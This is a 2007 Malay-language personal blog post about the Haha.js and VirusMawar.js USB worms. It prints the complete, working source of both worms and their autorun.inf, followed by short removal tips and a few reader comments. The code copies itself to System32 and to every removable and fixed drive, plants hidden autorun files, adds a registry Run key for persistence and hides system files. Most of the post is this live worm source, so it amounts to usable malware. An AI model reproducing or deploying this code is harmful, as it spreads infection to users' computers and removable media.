Najib’Palace

Personal weblog with news of software, hardware, technology, tips and tricks

virusmawar.js

Klik Kat Sini utk mengetahui cara cara nak remove virus haha.js , mawarvirus tu.

rasanye dah lama kot virus tersebar, virus ni tak kacau ape ape cuma saje dia nak mengatal beranak pinak kat semua removal disk yang korang insert kat pc korang tu.

nie contoh isi perut virus Haha.js

Haha.js

// Haha v1.0.0.2
// Constant
var ThisFileName = “\\Haha.js“;
var AutorunFileName = “\\AutoRun.inf“;
var CRLF = “\r\n”;
var RemovableDrive = 1;
var FixedDrive = 2;
var DelayStart = 10000;
var DelayProcess = 1000;
var DelayFixedDrive = 60000;

// Global Variable
var ThisText,AutorunText,tf,RegPath;

AutorunText = “[autorun]” + CRLF;
AutorunText = AutorunText + “Open = wscript.exe ” + ThisFileName + CRLF;
AutorunText = AutorunText + “shellexecute = wscript.exe ” + ThisFileName + CRLF;
AutorunText = AutorunText + “shell\\Open\\command = wscript.exe ” + ThisFileName + CRLF;
AutorunText = AutorunText + “shell\\Explore\\command = wscript.exe ” + ThisFileName + ” -Clicked” + CRLF;
AutorunText = AutorunText + “shell\\AutoPlay\\command = wscript.exe ” + ThisFileName + CRLF;
AutorunText = AutorunText + “shell\\Scan for Viruses\\command = wscript.exe ” + ThisFileName + CRLF;
AutorunText = AutorunText + “shell\\Scan with Norton AntiVirus\\command = wscript.exe ” + ThisFileName + CRLF;
AutorunText = AutorunText + “shell\\Scan with AVG\\command = wscript.exe ” + ThisFileName + CRLF;
AutorunText = AutorunText + “shell = Explore”;

var fs = new ActiveXObject(“Scripting.FileSystemObject”);
var ThisPath = fs.GetFile(WScript.ScriptFullname);
var check = ThisPath.Drive.DriveType;

var WinPath = new String(fs.GetSpecialFolder(0)); // Windows Folder
var SysPath = new String(fs.GetSpecialFolder(1)); // System32 Folder
var aShell = new ActiveXObject(“WScript.Shell”);

// Open the explorer if double clicked
var aArgs = WScript.Arguments;
for (var i = 0; i < aArgs.length; i++)
{
if(aArgs(i) == “-Clicked”)
{
aShell.Run(WinPath + “\\explorer.exe ” + WScript.ScriptFullname.substr(0,3));
}
}

WScript.Sleep(DelayStart);

// copy diri sendiri save kat win dir
var text;
try
{
text = ThisPath.OpenAsTextStream(1,-2); //1 – open for read, -2 using syetem default encoding
ThisText = “”;
while (!text.AtendOfStream) // copy this file to the ThisText
{
ThisText = ThisText + text.ReadLine();
ThisText = ThisText + “\n”;
}
} catch(e){}

do
{
try
{
if (fs.FileExists(SysPath + ThisFileName))
{
tf = fs.GetFile(SysPath + ThisFileName);
tf.Attributes = 32; // Archive
}
tf = fs.CreateTextFile(SysPath + ThisFileName, 2, true); // overite n unicode
tf.Write(ThisText);
tf.Close();
tf = fs.GetFile(SysPath + ThisFileName);
tf.Attributes = 39; // Archive, ReadOnly, Hidden, System
} catch(e){}

var DrivesEnum = new Enumerator(fs.Drives);
var aDrive;
for (; !DrivesEnum.atEnd(); DrivesEnum.moveNext())
{
aDrive = DrivesEnum.item();
if ((aDrive.DriveType == RemovableDrive || aDrive.DriveType == FixedDrive) && aDrive.Path != “A:”) // 1 – Removable, 2 – Fixed
{
// copy diri sendiri save kat flash drive
try
{
if (fs.FileExists(aDrive.Path + ThisFileName))
{
tf = fs.GetFile(aDrive.Path + ThisFileName);
tf.Attributes = 32;
}
tf = fs.CreateTextFile(aDrive.Path + ThisFileName, 2, true);
tf.Write(ThisText);
tf.Close();
tf = fs.GetFile(aDrive.Path + ThisFileName);
tf.Attributes = 39;
} catch(e){}

// copy autorun.inf save kat flash drive
try
{
if (fs.FileExists(aDrive.Path + AutorunFileName))
{
tf = fs.GetFile(aDrive.Path + AutorunFileName);
tf.Attributes = 32;
}
tf = fs.CreateTextFile(aDrive.Path + AutorunFileName, 2, true);
tf.Write(AutorunText);
tf.Close();
tf = fs.GetFile(aDrive.Path + AutorunFileName);
tf.Attributes = 39;
} catch(e){}
}
}

// set registry
try
{
WScript.Sleep(DelayProcess);
//RegPath = “HKEY_LOCAL_MACHINE”;
//RegPath = RegPath + “\\Software\\Microsoft\\Windows\\CurrentVersion\\Run“;
//RegPath = RegPath + “\\Haha“;
//aShell.RegWrite(RegPath, “wscript.exe ” + SysPath + ThisFileName, “REG_SZ”);
//RegPath = “HKEY_CURRENT_USER”;
//RegPath = RegPath + “\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced“;
//RegPath = RegPath + “\\ShowSuperHidden“;
//aShell.RegWrite(RegPath, 0, “REG_DWORD”);
RegPath = “HKEY_CURRENT_USER”;
RegPath = RegPath + “\\Software\\Microsoft\\Internet Explorer\\Main”;
RegPath = RegPath + “\\Window Title”;
aShell.RegWrite(RegPath, “Haha”, “REG_SZ”);
} catch(e){}

// wait 1 min for fixed drv
if (check != RemovableDrive)
WScript.Sleep(DelayFixedDrive);

} while(check != RemovableDrive && WScript.ScriptFullname.substr(0,3).toLowerCase() == SysPath.substr(0,3).toLowerCase())

// Run system Haha before this Haha closed
if (check == RemovableDrive)
aShell.Run(“wscript.exe ” + SysPath + ThisFileName);
———————————————————

nie lak isi perut sekutu dia

autorun.js

[autorun]
Open = wscript.exe \VirusMawar.js
shellexecute = wscript.exe \VirusMawar.js
shell\Open\command = wscript.exe \VirusMawar.js
shell\Explore\command = wscript.exe \VirusMawar.js -Clicked
shell\AutoPlay\command = wscript.exe \VirusMawar.js
shell\Scan for Viruses\command = wscript.exe \VirusMawar.js
shell\Scan with Norton AntiVirus\command = wscript.exe \VirusMawar.js
shell\Scan with AVG\command = wscript.exe \VirusMawar.js
shell = Explore

————————————

yang ni aku rasa baru je aku jumpa dalam pc aku nieh…VirusMawar.js. cara dia beroperasi sama dengan Haha.js

VirusMawar.js

// Haha1.0.0.2

// Constant

var ThisFileName = “\\VirusMawar.js“;

var Mwrdy=”\\Mwrdy.exe

var AutorunFileName = “\\AutoRun.inf“;

var CRLF = “\r\n”;

var RemovableDrive = 1;

var FixedDrive = 2;

var DelayStart = 10000;

var DelayProcess = 1000;

var DelayFixedDrive = 60000;

// Global Variable

var ThisText,AutorunText,tf,RegPath;

AutorunText = “[autorun]” + CRLF;

AutorunText = AutorunText + “Open = wscript.exe ” + ThisFileName + CRLF;

AutorunText = AutorunText + “shellexecute = wscript.exe ” + ThisFileName + CRLF;

AutorunText = AutorunText + “shell\\Open\\command = wscript.exe ” + ThisFileName + CRLF;

AutorunText = AutorunText + “shell\\Explore\\command = wscript.exe ” + ThisFileName + ” -Clicked” + CRLF;

AutorunText = AutorunText + “shell\\AutoPlay\\command = wscript.exe ” + ThisFileName + CRLF;

AutorunText = AutorunText + “shell\\Scan for Viruses\\command = wscript.exe ” + ThisFileName + CRLF;

AutorunText = AutorunText + “shell\\Scan with Norton AntiVirus\\command = wscript.exe ” + ThisFileName + CRLF;

AutorunText = AutorunText + “shell\\Scan with AVG\\command = wscript.exe ” + ThisFileName + CRLF;

AutorunText = AutorunText + “shell = Explore”;

var fs = new ActiveXObject(“Scripting.FileSystemObject”);

var ThisPath = fs.GetFile(WScript.ScriptFullname);

var check = ThisPath.Drive.DriveType;

var WinPath = new String(fs.GetSpecialFolder(0)); // Windows Folder

var SysPath = new String(fs.GetSpecialFolder(1)); // System32 Folder

var aShell = new ActiveXObject(“WScript.Shell”);

// Open the explorer if double clicked

var aArgs = WScript.Arguments;

for (var i = 0; i < aArgs.length; i++)

{

if(aArgs(i) == “-Clicked”)

{

aShell.Run(WinPath + “\\explorer.exe ” + WScript.ScriptFullname.substr(0,3));

}

}

WScript.Sleep(DelayStart);

// copy diri sendiri save kat win dir

var text;

try

{

text = ThisPath.OpenAsTextStream(1,-2); //1 – open for read, -2 using syetem default encoding

ThisText = “”;

while (!text.AtendOfStream) // copy this file to the ThisText

{

ThisText = ThisText + text.ReadLine();

ThisText = ThisText + “\n”;

}

} catch(e){}

do

{

try

{

if (fs.FileExists(SysPath + ThisFileName))

{

tf = fs.GetFile(SysPath + ThisFileName);

tf.Attributes = 32;

tf2 = fs.GetFile(SysPath + Mwrdy);

tf2.Attributes = 32;// Archive

}

tf = fs.CreateTextFile(SysPath + ThisFileName, 2, true); // overite n unicode

tf.Write(ThisText);

tf.Close();

tf = fs.GetFile(SysPath + ThisFileName);

tf.Attributes = 39;

tf2 = fs.GetFile(SysPath + Mwrdy);

tf2.Attributes = 39;// Archive, ReadOnly, Hidden, System

} catch(e){}

var DrivesEnum = new Enumerator(fs.Drives);

var aDrive;

for (; !DrivesEnum.atEnd(); DrivesEnum.moveNext())

{

aDrive = DrivesEnum.item();

if ((aDrive.DriveType == RemovableDrive || aDrive.DriveType == FixedDrive) && aDrive.Path != “A:”) // 1 – Removable, 2 – Fixed

{

// copy diri sendiri save kat flash drive

try

{

if (fs.FileExists(aDrive.Path + ThisFileName))

{

tf = fs.GetFile(aDrive.Path + ThisFileName);

tf.Attributes = 32;

tf2 = fs.GetFile(aDrive.Path + Mwrdy);

tf2.Attributes = 32;

}

tf = fs.CreateTextFile(aDrive.Path + ThisFileName, 2, true);

tf.Write(ThisText);

tf.Close();

tf = fs.GetFile(aDrive.Path + ThisFileName);

tf.Attributes = 39;

tf2 = fs.GetFile(aDrive.Path + Mwrdy);

tf2.Attributes = 39;

} catch(e){}

// copy autorun.inf save kat flash drive

try

{

if (fs.FileExists(aDrive.Path + AutorunFileName))

{

tf = fs.GetFile(aDrive.Path + AutorunFileName);

tf.Attributes = 32;

}

tf = fs.CreateTextFile(aDrive.Path + AutorunFileName, 2, true);

tf.Write(AutorunText);

tf.Close();

tf = fs.GetFile(aDrive.Path + AutorunFileName);

tf.Attributes = 39;

} catch(e){}

}

}

// set registry

try

{

WScript.Sleep(DelayProcess);

RegPaths = “HKEY_LOCAL_MACHINE”;

RegPaths = RegPaths + “\\Software\\Microsoft\\Windows\\CurrentVersion\\Run“;

RegPaths = RegPaths + “\\VirusMawar“;

aShell.RegWrite(RegPaths, “wscript.exe ” + SysPath + ThisFileName, “REG_SZ”);

RegPathss = “HKEY_CURRENT_USER”;

RegPathss = RegPathss + “\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced“;

RegPathss = RegPathss + “\\ShowSuperHidden“;

aShell.RegWrite(RegPathss, 0, “REG_DWORD”);

RegPath = “HKEY_CURRENT_USER”;

RegPath = RegPath + “\\Software\\Microsoft\\Internet Explorer\\Main”;

RegPath = RegPath + “\\Window Title”;

aShell.RegWrite(RegPath, “Virus Mawar SEDANG MENGGANAS WARHAHAHAHAHAHAHA++++=====”, “REG_SZ”);

} catch(e){}

// wait 1 min for fixed drv

if (check != RemovableDrive)

WScript.Sleep(DelayFixedDrive);

} while(check != RemovableDrive && WScript.ScriptFullname.substr(0,3).toLowerCase() == SysPath.substr(0,3).toLowerCase())

// Run system VirusMawar before this VirusMawar closed

if (check == RemovableDrive)

aShell.Run(“wscript.exe ” + SysPath + ThisFileName);

salah satu cara nak remove virus nie korang download software Scotty Winpatrol dan search files Haha.js / Autorun.inf / VirusMawar.js lepas tu right-click then pilih “Delete On Reboot” lepas tu korang search dalam internet files UnHookExec.inf then download pastu double-click files UnHookExec.inf. taraaaaa lepas tu dah cuci pon komputer korank. ada pe pe masalah leh email starbucks.cafe@gmail.com atau layan je frenster aku www.friendster.com/ariyako

November 29, 2007 - Posted by | Virus-Tech

4 Comments »

  1. salam,
    aku dah delete kt winpatrol, tp tak boleh run UnHookExec.inf. acess denied… kenapa ya???

    Comment by Nasir | February 7, 2008 | Reply

  2. bole x btkan anti virus yang xkena install kat pc sendiri..maksudnya anda sediakan perkhidmatan scan virus mawar ni secara percuma?

    Comment by ila | February 12, 2008 | Reply

  3. uit.. igt sonang ke nk wt ntvirus cik adik oi..

    Comment by hunterz | March 18, 2008 | Reply

  4. kekekek nak wat ntvirus tu senang tapi nak wat software nt virus tu susah..pening tak ngan ayat tu..muheheheh :D…

    Comment by ariyako | April 20, 2008 | Reply


Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: